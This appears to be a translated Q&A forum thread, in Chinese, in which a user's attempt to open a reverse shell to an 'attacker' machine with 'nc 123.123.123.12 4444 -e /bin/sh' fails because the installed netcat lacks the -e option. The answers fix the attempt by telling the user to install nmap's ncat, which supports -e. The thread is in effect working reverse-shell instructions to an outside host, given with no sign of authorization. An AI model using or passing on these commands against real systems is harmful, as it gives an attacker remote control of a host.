我正在尝试从另一台(攻击者)机器上获取主机上的外壳。攻击者机器正在监听。我正在我的主机上运行以下命令
nc 123.123.123.12 4444 -e /bin/sh
我得到的输出:
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
答案1
netcat 有多种变体。安装nmap.org开发的netcat版本
在我的 Ubuntu 系统上,有 2 个软件包netcat
和ncat
. nmap 中的一个是ncat
并且支持该-e
选项。另一个则不然。
您需要找到适合您的发行版的软件包。
编辑:开卡利Linux(2022.3),该软件包netcat-openbsd
将netcat-traditional
安装不带选项的 netcat 版本-e
。如果您想要带有该-e
选项的版本,请安装该软件包ncat
。安装后ncat
,要启动的二进制文件将为/usr/bin/ncat
答案2
作为@G大师建议,您需要ncat
使用以下命令获取 nmap 变体:
$ apt install ncat
之后,使用ncat
命令而不是nc
.
答案3
当我想要制作反向 shell 时,发生在我身上,但由于以下消息而失败:
nc: invalid option -- 'e'
在这里我使用了ncat
代替,nc
并且都具有相同的功能。